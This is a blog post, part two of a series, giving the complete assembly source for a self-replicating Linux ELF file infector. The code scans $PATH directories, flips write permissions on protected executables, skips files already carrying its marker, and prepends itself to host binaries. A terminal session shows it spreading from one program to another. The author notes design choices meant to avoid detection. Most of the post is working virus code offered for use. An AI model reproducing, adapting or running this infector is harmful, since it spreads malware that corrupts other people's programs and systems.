A technique for ELF file infection - part 2.
In the previous blog post, I demonstrated a method of infecting ELF files. In this post, I would like to present a slightly improved version with additional features. The previous version of the infection code could only infect a single file, while the new version will be able to find potential host files and infect them automatically.
A good source of potential victim files is the $PATH environment variable, which contains a list of directories that may contain executable files. The program will search these directories for ELF files and infect them. It will also check whether a file is already infected, to avoid infecting the same file multiple times. In addition, it will only attempt to infect ELF files that it has access to.
To begin, I will embed a marker in the stub to make it easily recognizable and add safety guards in case execve fails. I will also pass the argp argument (the pointer to the environment table) in rdi to the payload function so that it can use $PATH to find potential victim files.
format ELF64 executable use64 ; XXX: You have to set this to the resulting ELF file size manually. SIZE equ 1486 ; XXX: You have to set this to the position of the "palaiologos" string ; in the binary yourself. SENTINEL_LOC equ 120 sys_execve equ 59 sys_open equ 2 sys_lseek equ 8 sys_memfd_create equ 319 sys_sendfile equ 40 sys_close equ 3 sys_exit equ 60 sys_getdents equ 78 sys_access equ 21 sys_stat equ 4 sys_chmod equ 90 entry _start sentinel: db 'palaiologos',0 memfd_path: db '/proc/self/fd/',0,0 self: db '/proc/self/exe' empty: db 0 size: dq SIZE load_elf: ; Open ourselves. xor esi, esi mov edi, self push sys_open pop rax syscall ; Obtain the length: seek to back. mov r8, rax mov rdi, r8 push sys_lseek pop rax syscall ; Call memfd_create, call with MFD_CLOEXEC. mov edi, empty push 1 pop rsi push sys_memfd_create pop rax syscall ; Copy the file contents to the memfd using sendfile. mov edx, size mov r9, rax mov rdi, rax mov rsi, r8 sub r10d, SIZE push sys_sendfile pop rax syscall ; Close the file descriptor we hold to our own binary. push sys_close pop rax mov rdi, r8 syscall ; Bravely assume that the memfd descriptor number is a single digit. ; This might or might not work all of the times, but improving upon ; this is trivially beyond the scope of this post. add r9d, 48 mov BYTE [memfd_path + 14], r9b ret ; The entry point. _start: ; Load the argp for the payload. mov rdi, [rsp] lea rdi, [rsp+8 + rdi*8 + 8] call payload ; Load the executable to a memfd. call load_elf ; Load the path to the executable mov rdi, memfd_path ; Prepare to call execve ; Load argc + argv lea rsi, [rsp + 8] ; Load argp mov rdx, [rsp] lea rdx, [rsp+8 + rdx*8 + 8] ; Perform the syscall push sys_execve pop rax syscall ; Exit in case execve returns due to error. mov rdi, -1 push sys_exit pop rax syscall
For the purposes of the new payload, I will need a random number generator (to determine whether to infect a file or not), a constant holding the path separator (to append it between the directory name and the file name), and two constants for the linear congruential generator (LCG): its multiplier and its increment. The generator state itself lives in the seed variable.
seed: dq 0 pathsep: db "/", 0 LCG_A equ 1103515245 LCG_B equ 12345
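To make the arithmetic concrete, here is a minimal Python sketch of the generator these two constants describe. It assumes the state wraps at 64 bits, as a register-sized multiply and add would; the names lcg_next and lcg_decide are illustrative and do not appear in the original program.

```python
LCG_A = 1103515245
LCG_B = 12345
MASK64 = (1 << 64) - 1  # assumption: the state wraps like a 64-bit register


def lcg_next(seed):
    """Advance the linear congruential generator by one step."""
    return (seed * LCG_A + LCG_B) & MASK64


def lcg_decide(seed, divisor):
    """Step the generator and report whether the new state is divisible by divisor.

    Returns (new_seed, is_multiple). Hypothetical helper for illustration.
    """
    new_seed = lcg_next(seed)
    return new_seed, new_seed % divisor == 0
```

With a divisor of 3, roughly one draw in three lands on a multiple, which is how a single constant can act as a coarse probability knob.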
Stalking for prey
The payload will be handling large amounts of stack data, so it must reserve sufficient space to ensure that the argp entries are not overwritten during the process. This is also an opportune time to initialize the random number generator.
; Wants to be called with argp in rdi. payload: ; Reserve a (somewhat arbitrary) amount of stack space. ; It needs to hold a few path buffers (3 buffers, 4096 bytes each) sub rsp, 12456 ; Query the current time stamp counter as a source of randomness. ; rdtsc will set rdx and rax to the higher and lower bits of the time ; stamp counter, so we put them together and store them in the RNG seed ; variable. rdtsc shl rdx, 32 or rdx, rax mov qword [seed], rdx
The next part is more involved, as the code must locate the $PATH variable in the environment key/value pair table. A simple solution is to iterate until the current envp entry is NULL, checking the prefix of each entry along the way. If the prefix is PATH=, the code discards the first 5 bytes (to skip the key name in the string) and saves the remainder to a register. This part is relatively straightforward, but it is essential to guard against environment key/value pairs that are shorter than 5 bytes in total, so that the comparison never reads past the end of a short string.
; Find "PATH=" in ARGP. .path_find_loop: ; NULL terminates argp, check for this. mov rax, qword [rdi] test rax, rax je .infect_done ; Load the first five bytes of the current string. ; If any of them is NUL, we skip to the next string. mov cl, byte [rax] test cl, cl je .path_loop_skip mov dl, byte [rax + 1] test dl, dl je .path_loop_skip mov bl, byte [rax + 2] test bl, bl je .path_loop_skip mov sil, byte [rax + 3] test sil, sil je .path_loop_skip mov r8b, byte [rax + 4] test r8b, r8b je .path_loop_skip ; Check if the ASCII values are right. cmp cl, 'P' jne .path_loop_skip cmp dl, 'A' jne .path_loop_skip cmp bl, 'T' jne .path_loop_skip cmp sil, 'H' jne .path_loop_skip cmp r8b, '=' je .path_found .path_loop_skip: ; Go to the next pointer in the argp array. add rdi, 8 jmp .path_find_loop .path_found: add rax, 5
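The same lookup can be sketched in a few lines of Python, which makes the length guard easier to see. This is only an illustration over a list of "KEY=value" strings; find_path_value is a hypothetical name, not part of the original program.

```python
def find_path_value(envp):
    """Return the text after 'PATH=' from a list of 'KEY=value' strings, or None."""
    prefix = "PATH="
    for entry in envp:
        # Entries shorter than the prefix can never match, so skip them
        # before looking at individual characters.
        if len(entry) >= len(prefix) and entry[:len(prefix)] == prefix:
            return entry[len(prefix):]
    return None
```

Note that an entry such as MANPATH=... is not matched, because the comparison is anchored at the start of the string.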
Next, the code selects the buffer that will hold the final path of the file to be infected. Because I wrote and golfed this program in advance, it also loads two constants here that may appear arbitrary: a syscall number and the divisor used when deciding whether to scan a directory.
; Select the final path buffer. lea r12, [rsp + 4256] ; Load two auxiliary constants. push 3 pop rbx push sys_open pop r8
At this point, the program can loop through the entries in the PATH variable and examine each of them. The loop continues until it encounters a NUL byte (indicating that the PATH string has been exhausted). On each iteration it copies the current path, that is, the string from the current position in the PATH variable up to the first colon or NUL terminator, whichever comes first.
.path_loop: ; Check if we've hit the end of the PATH variable. mov cl, byte [rax] test cl, cl je .infect_done ; Copy path until : or \0 is found. xor r13d, r13d .copy_path: test cl, cl je .attempt_scan cmp cl, ':' je .attempt_scan mov byte [rsp + r13 + 160], cl mov cl, byte [rax + r13 + 1] inc r13 jmp .copy_path .attempt_scan:
There are a few more things to be done with the path. Firstly, it must be NUL-terminated. Secondly, if the character that ended the copied entry is a colon, it must be skipped so that the next iteration starts at the following entry.
; NUL-terminate the path. mov ecx, r13d mov byte [rsp + rcx + 160], 0 xor ecx, ecx ; Check if we have to skip an extra colon. cmp byte [rax + r13], ':' sete cl add rcx, rax ; Decide whether we want to infect this directory. ; Take a random number from a linear congruential generator ; and divide it by three. The modulus of zero means "no". imul rax, qword [seed], LCG_A add rax, LCG_B mov qword [seed], rax xor edx, edx div rbx test rdx, rdx je .next_path
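The entry-by-entry walk over a colon-separated string can be written out as follows. This is a minimal sketch of the splitting logic only, with a hypothetical name (iter_path_entries); it keeps the same two steps as the prose: copy until a colon or the end, then skip the colon.

```python
def iter_path_entries(path_value):
    """Yield each colon-separated entry of a PATH-style string, left to right."""
    pos = 0
    while pos < len(path_value):
        end = pos
        # Copy characters until a colon or the end of the string.
        while end < len(path_value) and path_value[end] != ":":
            end += 1
        yield path_value[pos:end]
        # Skip the colon that ended this entry, if there was one.
        pos = end + 1 if end < len(path_value) else end
```

An empty entry (two adjacent colons) is yielded as an empty string, so a caller has to decide how to treat it.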
After obtaining a valid directory path, the program should now open it. It is crucial to verify the return code, as PATH entries do not have to be valid (they may not point to an existing directory). If the directory is invalid, it must be skipped.
; O_RDONLY | O_DIRECTORY mov esi, 0x10000 lea rdi, [rsp + 160] mov rax, r8 ; Preserve rcx through the system call. mov qword [rsp], rcx syscall mov rcx, qword [rsp] ; Clever way to determine whether the number is negative. bt eax, 31 jb .next_path ; Save the file descriptor. mov qword [rsp + 8], rax ; Copy the file descriptor elsewhere, because we are going to use ; it now, and it would be a shame if a syscall clobbered it ;). mov rbp, rax
The program will use the fairly low-level system call getdents to obtain directory entries in batches. Before proceeding, some entries should be randomly pruned to reduce the number of filesystem operations performed (which helps to remain undetected).
.getdents_loop: ; Load max path size. mov edx, 4096 ; Load the directory file descriptor. mov rdi, rbp ; Load the buffer address. lea rsi, [rsp + 8352] push sys_getdents pop rax syscall ; Jump to some common error stub that will close the ; directory descriptor in case of failure. test eax, eax je .getdents_err ; Preserve the amount of entries somewhere. ; eax is often trashed by system calls so we want to ; avoid it being lost. mov r14d, eax xor eax, eax .dir_loop: ; Load the current entry number, directory entries buffer ; and the random seed. mov r15d, eax lea rbx, [rsp + r15] add rbx, 8352 mov rax, qword [seed] .discard_loop: ; Done processing? cmp r14, r15 jbe .getdents_loop ; Extract the type of the directory entry. movzx ecx, word [rbx + 16] mov dl, byte [rbx + rcx - 1] ; Skip if not a regular file. We will not infect symlinks. cmp dl, 8 jne .give_up ; Invoke the LCG again. Skip the entry upfront if dividing by ; four gives modulus 0, that is, last two binary digits of the ; number are 0. imul rax, rax, LCG_A add rax, LCG_B mov qword [seed], rax test al, 3 je .discard_loop
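The offsets used above (16, 18, and the last byte of the record) come from the layout of the records that getdents writes on x86-64 Linux: two 8-byte fields, a 2-byte record length, the NUL-terminated name, and the entry type in the final byte. A minimal Python sketch of walking such a buffer, assuming a little-endian buffer and using the hypothetical name parse_dirents, looks like this:

```python
import struct

DT_REG = 8          # entry type for a regular file
HEADER_SIZE = 18    # d_ino (8) + d_off (8) + d_reclen (2)


def parse_dirents(buf):
    """Yield (name, d_type) for each linux_dirent record in buf."""
    offset = 0
    while offset + HEADER_SIZE <= len(buf):
        _d_ino, _d_off, d_reclen = struct.unpack_from("<QQH", buf, offset)
        if d_reclen <= HEADER_SIZE or offset + d_reclen > len(buf):
            break  # malformed or truncated record; stop rather than guess
        record = buf[offset:offset + d_reclen]
        # The name starts at byte 18 and is NUL-terminated; d_type is the
        # last byte of the record.
        name = record[HEADER_SIZE:-1].split(b"\x00", 1)[0]
        yield name.decode(errors="replace"), record[-1]
        offset += d_reclen
```

The value returned by the system call is the number of bytes written into the buffer, so the walk advances by each record's own length rather than by a fixed stride.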
With the file name, it is possible to construct the final buffer with the absolute path to be infected, taking care to address some quirks in the process.
; OK, first nul-terminate the final buffer with the filename ; so that the `concat` function can work properly. Then append the ; directory name to that empty final buffer. mov byte [rsp + 4256], 0 mov rdi, r12 lea rsi, [rsp + 160] call concat ; We need to terminate the path with a slash only if it is not present ; already. Check this. Use a dumb strlen-ish function. mov rax, r12 .len_loop: cmp byte [rax], 0 je .len_ok inc rax jmp .len_loop .len_ok: ; Slash? cmp byte [rax - 1], '/' je .has_slash mov esi, pathsep mov rdi, r12 call concat .has_slash: ; Append the file name now. lea rsi, [rbx + 18] mov rdi, r12 call concat
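The slash handling is the only subtle part of this step. A minimal Python sketch, assuming a non-empty directory string and using the hypothetical name join_path, shows the intended result:

```python
def join_path(directory, filename):
    """Join a directory and a file name, adding a slash only if one is missing."""
    path = directory
    # Assumption: directory is non-empty; an empty entry would need its own rule.
    if not path.endswith("/"):
        path += "/"
    return path + filename
```

Both "/usr/bin" and "/usr/bin/" therefore produce the same absolute path for a given file name.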
At this point, the program should check if the file is actually accessible for writing and devise a plan for what to do when it is not. The approach here is to try to temporarily alter the permissions of the file in the hope that it grants the necessary write access. If it does not, the file must be skipped. If it does, the program will restore the original permissions later.
; Check if we can access the file for reading and writing. mov rdi, r12 push 6 ; R_OK | W_OK pop rsi push sys_access pop rax syscall mov rcx, rax ; Decide whether we want to infect this file anyway. ; Same LCG and division stuff, except this time with the ; modulus of 10. imul rax, qword [seed], LCG_A add rax, LCG_B mov qword [seed], rax xor edx, edx push 10 pop rsi div rsi ; Proceed only if: ; (1) the file is not accessible ; (2) we want to infect it ; Handle a special case here: try to add an owner ; write permission bit to the file and see if this lets ; us access it... :). Might protect against some ; "overzealous" (removes write permissions on critical ; executables to avoid problems) but not "overly paranoid" ; (removes write permissions /and/ transfers ownership) users. ; In that case we can do nothing but hope that we get root somehow. test ecx, ecx je .normal_path test rdx, rdx jne .normal_path ; Stat the file. mov rdi, r12 lea rsi, [rsp + 16] push sys_stat pop rax syscall ; Set the owner write permission bit and call chmod. mov esi, dword [rsp + 40] or rsi, 128 mov dword [rsp + 40], esi mov rbp, r12 push sys_chmod pop r12 mov rax, r12 syscall ; Try to access again? mov rdi, rbp push 6 ; R_OK | W_OK again. pop rsi push sys_access pop rax syscall ; Still no? Restore the permissions. test eax, eax jne .restore_perms ; Yes => do infect. mov rdi, rbp call infect .restore_perms: mov esi, dword [rsp + 40] and esi, -129 ; Everything except the bit 7 mov dword [rsp + 40], esi mov rdi, rbp mov rax, r12 syscall ; File still not accessible. Give up. ; Load the directory descriptor. mov rax, qword [rsp + 8] mov r12, rbp mov rbp, rax jmp .give_up
If no difficulties were encountered, the file can be infected now with no extra alterations.
.normal_path: ; Check if we want to infect this file. test rdx, rdx jne .give_up ; Do infect. mov rdi, r12 call infect
Finally, a few fallback labels from the code defined above need to be implemented.
.give_up: ; We end up here when it's time to skip to ; the next directory entry. movzx ecx, word [rbx + 16] movzx eax, cx add eax, r15d jmp .dir_loop .getdents_err: ; We get here when it's time to close the ; directory descriptor and move on. mov rdi, rbp push sys_close pop rbx mov rax, rbx syscall ; Load the sys_open constant again push sys_open pop r8 mov rcx, qword [rsp] .next_path: ; Go to the next path to process add rcx, r13 mov rax, rcx jmp .path_loop .infect_done: ; Balance the stack and yield. add rsp, 12456 ret
The payload employs a concat procedure to join two NUL-terminated strings. The implementation is relatively straightforward and is as follows:
concat: ; Find the end of the first string. cmp byte [rdi], 0 lea rdi, [rdi + 1] jne concat ; Start appending characters in a loop. push -1 pop rax .do_loop: ; Nothing left in the source string. mov cl, byte [rsi + rax + 1] test cl, cl je .done mov byte [rdi + rax], cl inc rax jmp .do_loop .done: ; Null-terminate the string. mov byte [rdi + rax], 0 ret
An improved infection function
The improved infection function will have several qualities that make it superior to the previous version. Most notably, the new infection function includes improved ELF file detection and better protection against re-infection. The process begins by opening the target file and reading and verifying the ELF header.
infect: ; Preserve a bunch of registers that the caller function needs. push r15 push r14 push rbx ; Reserve enough space for the transaction buffer. sub rsp, 200 + SIZE ; Open the goat file w/ O_RDWR. mov rbx, sys_open mov rsi, rbx mov rax, rbx syscall ; Check if the file was opened successfully. bt eax, 31 jb .cleanup ; Read the ELF header. mov r8d, eax lea rsi, [rsp - 112] ; Size of the ELF header. mov rdx, 64 mov rdi, r8 ; sys_read = 0 xor eax, eax syscall ; Check machine type (AMD64, code 62) cmp word [rsi + 18], 62 jne .elf_bad ; ELF class (64-bit) cmp byte [rsp - 108], 2 jne .elf_bad ; Check the 0x7f ELF magic. cmp byte [rsp - 109], 'F' jne .elf_bad cmp byte [rsp - 110], 'L' jne .elf_bad cmp byte [rsp - 111], 'E' jne .elf_bad cmp byte [rsp - 112], 0x7F jne .elf_bad
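The three header checks map onto fixed offsets in the 64-byte ELF header: the magic in bytes 0 to 3, the class in byte 4, and the machine type as a 16-bit value at offset 18. A minimal Python sketch of the same validation follows; it assumes a little-endian header, and the function name is hypothetical.

```python
import struct

ELF_MAGIC = b"\x7fELF"
ELFCLASS64 = 2
EM_X86_64 = 62
ELF64_HEADER_SIZE = 64


def looks_like_elf64_x86_64(header):
    """Return True if header looks like a 64-bit x86-64 ELF header."""
    if len(header) < ELF64_HEADER_SIZE:
        return False  # a short read cannot hold a complete header
    if header[:4] != ELF_MAGIC:
        return False
    if header[4] != ELFCLASS64:
        return False
    # Assumption: little-endian encoding, which is what x86-64 binaries use.
    (e_machine,) = struct.unpack_from("<H", header, 18)
    return e_machine == EM_X86_64
```

Checking the length first matters: a file shorter than the header would otherwise be judged on whatever bytes happened to be in the buffer.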
The function will check for the sentinel to determine if the file has already been infected. If the sentinel is present, the infection process should be terminated.
; Rewind to the SENTINEL_LOC-th byte. We want to check ; if this ELF file was already infected. mov r9, sys_lseek mov rsi, SENTINEL_LOC mov rdi, r8 xor edx, edx mov rax, r9 syscall ; Read 12 bytes (length of "palaiologos\0") lea rsi, [rsp - 128] mov rdx, 12 xor eax, eax syscall ; Check if the sentinel is present. movq xmm0, qword [rsi] movq rax, xmm0 ; Check the first part. mov rcx, 'palaiolo' cmp rax, rcx jne .elf_clean ; Check the remaining bytes: gos\0 cmp byte [rsp - 120], 'g' jne .elf_clean cmp byte [rsp - 119], 'o' jne .elf_clean cmp byte [rsp - 118], 's' jne .elf_clean cmp byte [rsp - 117], 0 jne .elf_clean .elf_bad: ; Close ourselves and return. Already infected. mov rax, 3 mov rdi, r8 syscall jmp .cleanup .elf_clean:
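Because the marker sits at a fixed offset, the same comparison is easy to run from the outside, for example to check whether a given file already carries it. A minimal Python sketch over a bytes object, using the marker string and offset from the listing above and a hypothetical function name:

```python
SENTINEL = b"palaiologos\x00"   # 12 bytes, including the terminating NUL
SENTINEL_LOC = 120              # offset taken from the listing above


def has_marker(data, offset=SENTINEL_LOC):
    """Return True if data contains the marker string at the given offset."""
    # Slicing past the end yields a shorter slice, so short inputs compare unequal.
    return data[offset:offset + len(SENTINEL)] == SENTINEL
```

The offset is a parameter because the listing notes that it has to be set by hand for a particular build.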
The infection process is not much different from the previous iteration: the code will open the current executable, create a memory-backed file descriptor, and write the infectious stub to it followed by the target file.
; Open self. mov edi, self xor esi, esi mov rax, rbx syscall ; Open a memfd with O_CLOEXEC. mov r10d, eax mov r14, 1 mov edi, empty mov eax, sys_memfd_create mov rsi, r14 syscall ; Copy over the viral stub from ourselves to the memfd. mov ebx, eax lea r15, [rsp - 48] mov edx, SIZE mov rdi, r10 mov rsi, r15 xor eax, eax syscall mov edx, SIZE mov rdi, rbx mov rax, r14 syscall ; Seek to the beginning of the goat file (we want the ELf header back). mov rdi, r8 xor esi, esi xor edx, edx mov rax, r9 syscall ; Copy data from the goat file to the memfd in a loop. .copy_goat_memfd: mov edx, SIZE mov rdi, r8 mov rsi, r15 xor eax, eax syscall test eax, eax je .copy_goat_memfd_done mov edx, eax mov rdi, rbx mov rsi, r15 mov rax, r14 syscall jmp .copy_goat_memfd
After constructing a valid parasitic ELF file, the final step is to rewind both files to the first byte and copy the contents of the memory-backed file descriptor to the target file. An improvement that could be made here is to check whether there is sufficient disk space to append the stub, but this scenario is extremely unlikely to pose an issue, so it is not worth the effort. It could, however, be implemented using ftruncate followed by appropriate error checking.
; Rewind the goat file and the memfd. .copy_goat_memfd_done: mov rdi, rbx xor esi, esi xor edx, edx mov rax, r9 syscall mov rdi, r8 xor esi, esi xor edx, edx mov rax, r9 syscall ; Overwrite the goat file with the memfd contents. lea rsi, [rsp - 48] .copy_memfd_goat: mov edx, SIZE mov rdi, rbx xor eax, eax syscall test eax, eax je .copy_memfd_goat_done mov edx, eax mov rdi, r8 mov rax, r14 syscall jmp .copy_memfd_goat .copy_memfd_goat_done: ; Close goat, memfd, and self. mov rdx, sys_close mov rdi, rbx mov rax, rdx syscall mov rdi, r8 mov rax, rdx syscall mov rdi, r10 mov rax, rdx syscall .cleanup: ; Balance the stack and quit. add rsp, 200 + SIZE pop rbx pop r14 pop r15 ret
The new, improved ELF file infector is undoubtedly better than the original; however, it still lacks a genuine payload, stealthiness, and code compression. I will discuss these topics in the next essay in the series. Please stay tuned!
The following terminal session demonstrates the program’s capabilities. I have artificially created an environment with a single-directory $PATH variable that contains two common UNIX programs. I have linked the date program to the infector to reduce the amount of text output compared to the previous example using
~ % echo $PATH
/home/palaiologos/jail
~ % ls -la jail
total 192
drwxr-xr-x 2 palaiologos palaiologos 4096 Jan 4 21:59 .
drwxr-xr-x 9 palaiologos palaiologos 20480 Jan 4 19:51 ..
-rwxr-xr-x 1 palaiologos palaiologos 44016 Jan 5 00:37 cat
-rwxr-xr-x 1 palaiologos palaiologos 125640 Jan 5 00:37 sh
~ % ./stub && ls -la jail
Thu Jan 5 12:45:33 AM CET 2023
total 196
drwxr-xr-x 2 palaiologos palaiologos 4096 Jan 4 21:59 .
drwxr-xr-x 9 palaiologos palaiologos 20480 Jan 4 19:51 ..
-rwxr-xr-x 1 palaiologos palaiologos 45450 Jan 5 00:45 cat
-rwxr-xr-x 1 palaiologos palaiologos 125640 Jan 5 00:37 sh
~ % # cat was infected! if we run it now, the shell should also get infected.
~ % ./jail/cat /dev/null && ls -la jail
total 196
drwxr-xr-x 2 palaiologos palaiologos 4096 Jan 4 21:59 .
drwxr-xr-x 9 palaiologos palaiologos 20480 Jan 4 19:51 ..
-rwxr-xr-x 1 palaiologos palaiologos 45450 Jan 5 00:45 cat
-rwxr-xr-x 1 palaiologos palaiologos 127074 Jan 5 00:37 sh